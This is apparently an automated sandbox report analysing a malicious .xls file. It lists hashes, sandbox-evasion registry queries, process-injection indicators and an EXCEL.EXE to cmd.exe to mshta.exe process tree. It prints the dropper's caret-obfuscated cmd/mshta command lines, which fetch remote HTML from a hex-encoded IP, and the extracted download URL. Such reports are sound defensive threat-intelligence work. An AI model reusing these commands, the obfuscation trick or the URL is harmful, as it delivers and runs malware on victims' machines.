Analysis
max time kernel: 133s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11-11-2024 18:00
Behavioral task: behavioral1
Sample: 9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls
Resource: win7-20240729-en
Behavioral task: behavioral2
Sample: 9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls
Resource: win10v2004-20241007-en
General
Target: 9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls
Size: 102KB
MD5: a8c9638fbe2369dcea2c111939094feb
SHA1: f14b244c6972c94a63468704f6bdb0c9da38eeef
SHA256: 9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d
SHA512: 209382608340a289e98988540e5798abce794c29f7144789a916b396d61a4238ac6eb5a4d7c7be750577b83f32b42aaa1dffdc8a0623aad06d3b83c9e89a2e0b
SSDEEP: 3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK
Malware Config
Extracted: http://185.7.214.7/fer/fe3.html (dotted-decimal form of the hex-encoded host 0xb907d607 that appears in the cmd.exe and mshta.exe command lines below)
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; pid: 4316; pid_target: 4516; Process: cmd.exe; procid_target: 82
Blocklisted process makes network request 1 IoCs
flow: 19; pid: 3232; Process: mshta.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (Process: EXCEL.EXE)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (Process: EXCEL.EXE)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (Process: EXCEL.EXE)
Enumerates system info in registry 2 TTPs 3 IoCs
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (Process: EXCEL.EXE)
Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (Process: EXCEL.EXE)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (Process: EXCEL.EXE)
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid: 4516; Process: EXCEL.EXE
Suspicious use of SetWindowsHookEx 12 IoCs
pid: 4516; Process: EXCEL.EXE (12 entries, all from the same EXCEL.EXE process)
Suspicious use of WriteProcessMemory 4 IoCs
PID 4516 wrote to memory of 4316; pid: 4516; Process: EXCEL.EXE; procid_target: 85 (2 entries)
PID 4316 wrote to memory of 3232; pid: 4316; Process: cmd.exe; procid_target: 88 (2 entries)
Processes
1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls"
   PID: 4516
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SYSTEM32\cmd.exe (child of PID 4516)
      Command line (cmd caret escapes obscure the tokens; the child's command line shows the resolved form): cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html
      PID: 4316
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\mshta.exe (child of PID 4316)
         Command line: mshta http://0xb907d607/fer/fe3.html
         PID: 3232
         - Blocklisted process makes network request
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 1KB
MD5: f773a2558ffdb1928b330d840e53d4fd
SHA1: cf297ab984cb935a9c79be415cc3f4909c70ea5c
SHA256: 135b5c5570506fac9f7873a300d39d3dd7c3abe4de1836aa77818e34f520c466
SHA512: 8b0612a91f97ae2dda2cb3b58cb0bf19dca66cf48177d4a39deb92fe933e327fc432975700e3d6c9d868e4a3a435b3cb21c1bac29f1b11b45c197eefccb719d1